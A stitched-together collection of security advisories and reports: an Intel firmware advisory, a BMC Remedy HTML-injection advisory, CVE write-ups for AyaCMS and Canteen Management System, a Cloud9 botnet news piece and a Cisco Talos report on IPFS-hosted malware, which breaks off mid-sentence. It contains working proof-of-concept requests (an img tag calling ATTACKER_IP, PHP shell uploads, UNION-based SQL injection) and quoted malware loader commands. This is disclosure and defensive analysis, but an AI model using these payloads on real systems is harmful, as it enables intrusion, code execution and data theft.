Improper input validation in the firmware for some Intel(R) Server Board M10JNP Family before version 7.216 may allow a privileged user to potentially enable an escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Server Boards and Server Systems Advisory**

Intel ID:

INTEL-SA-00708

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® Server Boards and Server Systems may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities

**Vulnerability Details:**

CVEID: CVE-2022-30542

Description: Improper input validation in the firmware for some Intel(R) Server Board S2600WF, Intel(R) Server System R1000WF and Intel(R) Server System R2000WF families before version R02.01.0014 may allow a privileged user to potentially enable an escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2021-0185

Description: Improper input validation in the firmware for some Intel(R) Server Board M10JNP Family before version 7.216 may allow a privileged user to potentially enable an escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-25917

Description: Uncaught exception in the firmware for some Intel(R) Server Board M50CYP Family before version R01.01.0005 may allow a privileged user to potentially enable a denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

*   Intel® Server Board S2600WF Family.
*   Intel® Server Board M50CYP Family.
*   Intel® Server Board M10JNP Family.
*   Intel® Server System R1000WF Family.
*   Intel® Server System R2000WF Family.

**Recommendations:**

Intel recommends updating the firmware for the affected Intel® Server Boards and Server Systems to the latest version:

Intel(R) Server System R1000WF, R200WF and Intel(R) Server Board S2600WF Family updates are available here.

Intel(R) Server Board M50CYP Family updates are available here.

Intel(R) Server Board M10JNP Family updates are available here.

**Acknowledgements:**

The following issues were found internally by Intel employees; CVE-2022-30542 and CVE-2022-25917. Intel would like to thank Jorge E. Gonzalez Diaz.

Intel would like to thank Dmitry Frolov (CVE-2021-0185) for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-0185: INTEL-SA-00708

An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the "number of recipients" field. NOTE: the vendor's position is that "no real impact is demonstrated."

The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the "To" field of the mail editor. Afterwards the application shows in the activity log that the incident was forwarded to <X> recipients. By clicking on the number of recipients the injected HTML is loaded and executed.

**Vendor description**

_"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model."_

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

**Business recommendation**

The vendor provides an updated version which should be installed immediately.

The vendor states that:

1.  We have done hardening in version 22.1.
2.  However, we do not agree with assigning the CVE to this vulnerability.
3.  As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Vulnerability overview/description****1) HTML Injection (CVE-2022-26088)**

An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the "To:" field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force the user's browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Proof of concept****1) HTML Injection (CVE-2022-26088)**

When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing the 'Email.To.InternetEmail' parameter. The modified request is:

    PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
    Host: TARGET
    Cookie: […]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    X-Xsrf-Token: SOME_TOKEN
    Content-Length: ADAPT_AS_NEEDED
    Te: trailers
    Connection: close
    
    {
      "worknote": "pentest",
      "access": true,
      "Email.From.Person": {
        "email": "SOME_SENDING_MAIL",
        "fullName": "Pentest - SEC Consult",
        "loginId": "USERNAME"
      },
      "Email.Subject": "SOME_SUBJECT",
      "Email.Body": "test2",
      "Email.To.InternetEmail": "<img src=http: //ATTACKER_IP:8001/>a@example.test",
      "workInfoType": 16000
    }

The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:

    "<img src=http: //LOCAL_IP:8001/>a@example.test"

The a@example.test is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident.

Now we start a local netcat listener with the command:

    $ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser issues a request to our 'netcat' instance. This confirms that the browser tries to load the image from the specified URL.

**Vulnerable / tested versions**

The following version has been tested:

*   9.1.10 this corresponds to version 20.02 as stated at the following URL https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping 

**Vendor contact timeline**

**Solution**

Upgrade to version 22.1 or later which can be downloaded at the vendor's page:

https://www.bmc.com/support/resources/product-downloads.html

**Workaround**

None

**Advisory URL**

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger / @2022

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite

AyaCMS v3.1.2 was discovered to contain an arbitrary file upload vulnerability via the component /admin/fst_upload.inc.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerable path /aya/module/admin/fst\_upload.inc.php

Lines 11-15 of the "fst.upload.inc.php" file do not judge the uploaded file name suffix and file content, so arbitrary files can be uploaded, resulting in arbitrary code execution vulnerabilities

Vulnerability exploitation process:

    POST /admin.php?action=fst_upload&file= HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------19139953963909426187499573422
    Content-Length: 253
    Origin: http://127.0.0.1:8080
    Connection: close
    Referer: http://127.0.0.1:8080/admin.php?action=fst
    Cookie: PHPSESSID=df5df4jinm0nvp4vfkm6t3fjr1; amsg=; aclass=; aya_template=pc; aya_auth=V2UQGA8%2BEiJCfV87V2ZTVl9vDD4MOEckT3cEahZ4UmpAIRYmCz0CMlA3XWdBJ0IoW24AMQtuVDVXPgM5BGJba1cxECkPOxJ%2BQiVfYFcxU24
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------19139953963909426187499573422
    Content-Disposition: form-data; name="upfile"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    -----------------------------19139953963909426187499573422--

CVE-2022-43074: AnyaCMS v3.1.2 has an Arbitrary File Upload Vulnerability · Issue #3 · loadream/AyaCMS

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via ip/youthappam/php_action/editFile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/php\_action/editFile.php?id=1

Loophole location: Canteen Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：‘

POST /youthappam/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------88582622926272
Content-Length: 422
\-----------------------------88582622926272
Content-Disposition: form-data; name="old\_image"
\-----------------------------88582622926272
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------88582622926272
Content-Disposition: form-data; name="btn"
\-----------------------------88582622926272--

The files will be uploaded to this directory \\youthappam\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43277: bug_report/RCE-1.md at main · HuahuaDaren/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the categoriesId parameter at /php_action/fetchSelectedCategories.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedCategories.php

Vulnerability location: /youthappam/php\_action/fetchSelectedCategories.php, categoriesId

dbname =youthappam,length=10

\[+\] Payload: categoriesId=-1 union select 1,database(),3,4 // Leak place ---> categoriesId

POST /youthappam/php\_action/fetchSelectedCategories.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
categoriesId=-1 union select 1,database(),3,4

CVE-2022-43278: bug_report/SQLi-1.md at main · HuahuaDaren/bug_report

The Swiss Army knife-like browser extension is heaven for attackers — and can be hell for enterprise users.

A malicious browser extension that works on both Google Chrome and Microsoft Edge allows attackers to remotely take over someone's browser session and carry out a full range of attacks. It's built to steal cookies and other info, mine cryptocurrency, install malware, or take over the entire device for use in a distributed denial-of-service (DDoS) attack — among other things.  

Thanks to this multitool approach, the Cloud9 botnet basically acts like a remote access Trojan (RAT) for the Chromium browser, which is the framework for Chrome, Edge, and some other browsers, researchers at Zimperium zLabs revealed in a blog post Nov. 8.

The malware is comprised of three JavaScript files and has been active since as far back as 2017, with an update in 2020 that proliferated as a single JavaScript that can be included on any website using script tags, researchers said.

Researchers have linked Cloud9 to the Keksec malware group due to the activity of its command-and-control servers (C2s), which point to domains previously used by the gang. The well-resourced group — known for creating various botnets-for-hire — was seen in June weaponizing a Linux botnet called EnemyBot against vulnerabilities in enterprise services. In Cloud9's case, it's likely being sold "for a few hundred dollars" or offered for free to other groups on various hacker forums, researchers said.

"As it is quite trivial to use and available for free, it can be used by many malware groups or individuals for specific purposes," Zimperium zLabs malware analyst Nipun Gupta wrote in the post.

**Enterprise Users at Risk**

The malware offers a veritable buffet of nefarious activity, "purposefully designed to target all kinds of users and serves its purpose of retrieving user information," Gupta wrote. This includes enterprise users, where the botnet can be used to infiltrate a user's machine to propagate further malicious activity.

That said, "the Cloud9 malware does not target any specific group, meaning it is as much an enterprise threat as it is a consumer threat," Gupta wrote. "It is quite clear that this malware group is targeting all browsers and operating systems and thus trying to increase their attack surface."

Core capabilities of Cloud9 include: the ability to send GET/POST requests, which can be used to fetch malicious resources; cookie stealing to compromise user sessions; keylogging for nabbing passwords and other info; and the ability to launch a Layer 4/Layer 7 hybrid attack, which can be used to perform DDoS attacks from victims' machines.

Cloud9 also can detect a user's OS and/or browser to deliver next-stage payloads; inject ads by opening 'pop-unders'; execute JavaScript code from other sources for further malicious code delivery; silently load web pages for ad or malicious-code injection; mine cryptocurrency using the browser or the victim's device resources; or send a browser exploit to inject malicious code and take complete control of the device.

**Browser Escape and a Multifaceted Attack**

Researchers walked through an example of a Cloud9 attack on a Chrome browser, outlining several steps that ultimately perform a slew of nefarious tasks — including mining cryptocurrency from a victim's machine, stealing cookies and clipboard data, and even using exploits to "escape" the browser and execute malware on the victim's device.

The main functionality of the extension is available in a file named campaign.js, JavaScript that also can be used as a standalone and thus can redirect victims to a malicious website that contains the campaign.js script.

The campaign.js starts by identifying the victim's OS and then injects a JavaScript file that mines cryptocurrency using the victim's computer resources, both diminishing the performance of the device while reducing hardware lifespan and increasing energy usage — "which translates into a slow but steady monetary loss," Gupta noted.

Cloud9 then injects another script named cthulhu.js that contains a full-chain exploit for two vulnerabilities — CVE-2019-11708 and CVE-2019-98100 — that target Firefox on a 64-bit Windows OS. Upon successful exploitation, it drops Windows-based malware on the device, enabling the threat actor to take over the entire system.

Researchers also witnessed Cloud9 using other browser exploits for Internet Explorer (CVE-2014-6332, CVE-2016-0189) and Edge (CVE-2016-7200 that, if successful, gives the attacker the same user rights as the current user and can execute code on the victim's device accordingly. Further, if the user is logged on with administrative user rights, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights, researchers said.

Cloud9 also can use its ability to send POST requests to any domain to carry out Layer 7 DDoS attacks if the attacker has a significant number of victims connected as botnets. In fact, true to its reputation, Keksec likely is selling the extension to provide a botnet service to perform DDoS, Gupta noted.

**Protecting the Enterprise**

Because of the broad capabilities of Cloud9 and the wide attack surface it can generate, enterprise customers should be on alert, researchers said. Indeed, traditional endpoint security solutions don't typically monitor this type of attack vector, which leaves browsers "susceptible and vulnerable," Gupta observed.

It's unclear how Cloud9 is being spread, but so far, Zimperium zLabs has seen no evidence of the malicious extension on the Google Play Store or any other legitimate mobile app shop. For this reason, enterprises should train users on the risks associated with browser extensions that they encounter outside of official repositories, he said. They also should consider what security controls they have in place for such risks in their security posture overall.

Cloud9 Malware Offers a Paradise of Cyberattack Methods

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editfood.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editfood.php

Vulnerability location: /youthappam/editfood.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editfood.php?id=-1' union select 1,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /youthappam/editfood.php?id\=\-1' union select 1,database(),3,4,5,6,7,8,9--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43292: bug_report/SQLi-3.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editclient.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editclient.php

Vulnerability location: /youthappam/editclient.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /youthappam/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43291: bug_report/SQLi-2.md at main · songyangqi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /youthappam/editcategory.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: songyangqi

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editcategory.php

Vulnerability location: /youthappam/editcategory.php, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /youthappam/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

CVE-2022-43290: bug_report/SQLi-1.md at main · songyangqi/bug_report

The InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread abuse by threat actors.
Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
IPFS is often used for legitimate

*   The InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread abuse by threat actors.
*   Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
*   IPFS is often used for legitimate purposes, which makes it more difficult for security teams to differentiate between benign and malicious IPFS activity in their networks.
*   Multiple malware families are currently being hosted within IPFS and retrieved during the initial stages of malware attacks.
*   Organizations should become familiar with these new technologies and how they are being leveraged by threat actors to defend against new techniques that use them.

The emergence of new Web3 technologies in recent years has resulted in drastic changes to the way content is hosted and accessed on the internet. Many of these technologies are focused on circumventing censorship and decentralizing control of large portions of the content and infrastructure people use and access on a regular basis. While these technologies have legitimate uses in a variety of practical applications, they also create opportunities for adversaries to take advantage of them within their phishing and malware distribution campaigns. Over the past few years, Talos has observed an increase in the number of cybercriminals taking advantage of technologies like the InterPlanetary File System (IPFS) to facilitate the hosting of malicious content as they provide the equivalent of “bulletproof hosting” and are extremely resilient to attempts to moderate the content stored there.

**What is the InterPlanetary File System (IPFS)?**

The InterPlanetary File System (IPFS) is a Web3 technology designed to enable decentralized storage of resources on the internet. When content is stored on the IPFS network, it is mirrored across many systems that participate in the network, so that when one of these systems is unavailable, other systems can service requests for this content.

IPFS stores different types of data, such as the images associated with NFTs, resources used to render web pages, or files that can be accessed by internet users. IPFS was designed to be resilient against content censorship, meaning that it is not possible to effectively remove content from within the IPFS network once it’s stored there.

**IPFS gateways**

Users that wish to access content stored within IPFS can do so either using an IPFS client, such as the one provided here, or they can make use of “IPFS Gateways” which effectively sit between the internet and the IPFS network to allow clients to access content hosted on the network. This functionality is similar to what Tor2web gateways provide to access contents within the Tor network without requiring a client installation.

Anyone can set up an IPFS gateway using a range of publicly available tools. This screenshot shows several of the public IPFS gateways accessible across the internet.

It is simple to store new content within IPFS and once there, the content is resilient against takedowns, making it increasingly attractive to a variety of attackers for hosting phishing pages, malware payloads and other malicious content.

When systems use IPFS gateways to access contents stored on the IPFS network, they typically rely on the same HTTP/HTTPS-based communications used to access other websites on the internet. IPFS gateways can be configured to handle incoming requests in a few different ways. In some implementations, the subdomain specified in the HTTP request is often used to locate the requested resource on the IPFS network as shown in the following example, which is a mirrored copy of Wikipedia hosted on the IPFS network. The IPFS identifier, or CID, for the resource is highlighted below.

hxxps\[:\]//**bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze\[**.\]ipfs\[.\]infura-ipfs\[.\]io

In other implementations, the IPFS resource location is appended to the end of the URL being requested, as shown in the following example:

hxxps\[:\]//ipfs\[.\]io/ipfs/**bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze**

There are other methods for handling requests using DNS entries, as well. The specific implementation varies across IPFS gateways. Browsers have even begun implementing native support for the IPFS network, removing the need to use IPFS gateways in some cases.

**IPFS use in phishing campaigns**

IPFS is currently being leveraged to host phishing kits, which are the websites that phishing campaigns typically use to collect and harvest credentials from unsuspecting victims. In one example, the victim received a PDF that purports to be associated with the DocuSign document-signing service. A screenshot of one such PDF is shown below.

When the victim clicks on the “Review Document” link, they are redirected to a page made to appear as if it is a Microsoft authentication page. However, the page is actually being hosted on the IPFS network.

The user is prompted to enter an email address and password. This information is then transmitted to the attacker via an HTTP POST request to an attacker-controlled web server where it can be collected and processed for use in further attacks.

We’ve observed several similar examples in phishing campaigns over the past year, as adversaries recognize the content moderation challenges associated with hosting their phishing kits on the IPFS network. In this case, the PDF hyperlink was pointing to an IPFS gateway that moderated the content to protect potential victims and displayed the following message to victims attempting to navigate to it.

However, the content is still present within the IPFS network and simply changing the IPFS gateway being used to retrieve the content confirms this is the case.

**IPFS use in malware campaigns**

There are a variety of threat actors currently leveraging technologies like IPFS in their malware distribution campaigns. It provides low-cost storage for malicious payloads while offering resilience against content moderation, effectively acting as “bulletproof hosting” for adversaries. Likewise, the use of common IPFS gateways for accessing the malicious contents hosted within the IPFS network makes it more difficult for organizations to block access when compared to the use of malicious domains for content retrieval. We have observed various samples in the wild that are currently leveraging IPFS.

Throughout 2022, we’ve observed the volume of samples in the wild continuing to increase as this becomes a more popular hosting method for adversaries. Below is a graphic showing the increase in the number of unique samples relying on IPFS that have been uploaded to public sample repositories.

**Agent Tesla malspam campaign**

We’ve observed ongoing malspam campaigns leveraging IPFS throughout the infection process to eventually retrieve a malware payload. In one example, the email sent to victims purports to be from a Turkish financial institution and claims to be associated with SWIFT payments, a commonly used system for international monetary transactions.

The email contains a ZIP attachment that holds a PE32 executable. The executable, written in .NET, functions as a downloader for the next stage of the infection chain. When executed, the downloader reaches out to an IPFS gateway to retrieve a blob of data that has been hosted within the IPFS network as shown below.

This data contains an obfuscated PE32 executable that functions as the next-stage malware payload. The downloader takes the data from the IPFS gateway and stores each byte in an array. It then uses a key value stored in the executable to convert the byte array into the next-stage PE32.

This is then reflectively loaded and executed, launching the next stage of the infection process, which in this case is a remote access trojan (RAT) called Agent Tesla.

In another example, we observed a variety of malware payloads being uploaded to public sample repositories over a period of several months. We identified three distinct clusters of malware that were likely being created by the same threat actor. Code-level issues suggest that many of the samples were currently undergoing active development while being uploaded, possibly to test detection capabilities.

In all three clusters, the initial payload functioned as a loader and operated similarly, however, the final payload hosted on the IPFS network was different in each cluster. The final payloads we observed included a Python-based information stealer, reverse shell payloads that were likely generated using msfvenom, and a batch file designed to destroy victim systems.

**Initial loader**

The loader used in all of these cases functioned similarly, sometimes hosted on the Discord content delivery network (CDN), a practice that has become increasingly common with malware distributors as previously described here. The file names used indicate that they may have been spread under the guise of cheats and cracks for video games such as “Minecraft.” In most cases, the loader was not packed, but we did observe samples packed using UPX.

When executed, the loader first creates a directory structure within %APPDATA% using the following command:

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft && mkdir Network

The malware then attempts to retrieve Python 3.10 from the legitimate software provider using the cURL command.

This is notable, as the choice to directly leverage cURL may significantly reduce the number of potential victims, as it was not added to Windows as a native command line utility until Windows 11. The command line syntax used to initiate the download is shown below.

C:\Windows\system32\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip

Once the ZIP archive has been retrieved, it is then unzipped into the directory that was previously created using the PowerShell “Expand-Archive” cmdlet.

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\Microsoft\Network

The malware then attempts to retrieve the final payload in the infection chain, storing it within the Network directory using the filename “Packages.txt.” An example of the loader retrieving Hannabi Grabber, an information stealer written in Python is shown below.

The loader then uses the attrib.exe utility to set the System and Hidden flags on the previously created directory as well as the Python ZIP archive and final payload that was retrieved.

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip

C:\Windows\system32\cmd.exe /c attrib +S +H %appdata%\Microsoft\Network\Packages.txt

Finally, the loader invokes the newly downloaded Python executable and passes the final payload as a command line argument, executing the next stage of the infection process.

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && python.exe Packages.txt

In some cases, the malware was also observed achieving persistence via adding entries into the Windows registry at the following locations:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon  
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

During our analysis of samples associated with this loader, we observed that the IPFS gateway that was being used was no longer servicing requests, however, Talos obtained the next-stage payloads manually via another IPFS gateways for analysis.

**Reverse shell**

In one of the clusters leveraging this loader, we observed that the payload being hosted within the IPFS network was a Python script containing a large base64 encoded blob along with the Python code responsible for decoding the base64. Note that the following screenshot was redacted for space, as the base64-encoded blob was rather large.

The base64 contained several layers of base64 encoded blobs, each wrapped in Python code responsible for decoding them. After decoding all of the layers, the following is the deobfuscated reverse shell payload.

At the time of analysis, the C2 server was no longer servicing requests on TCP/4444.

**Destructive Malware**

In another cluster we analyzed, we observed that the final payload hosted within IPFS was a Windows batch file, as shown below:

When the batch file is retrieved, it is stored within the Network directory using the filename “Script.bat.”

This batch file is responsible for the following destructive behavior:

*   Deleting volume shadow copies on the system.
*   Deleting directory contents stored within C:\\Users (typically associated with user profiles).
*   Iterating through all mounted filesystems present on the system and deleting contents stored on them.

Fortunately for victims, in the samples analyzed the loader incorrectly attempts to invoke the batch file as shown below.

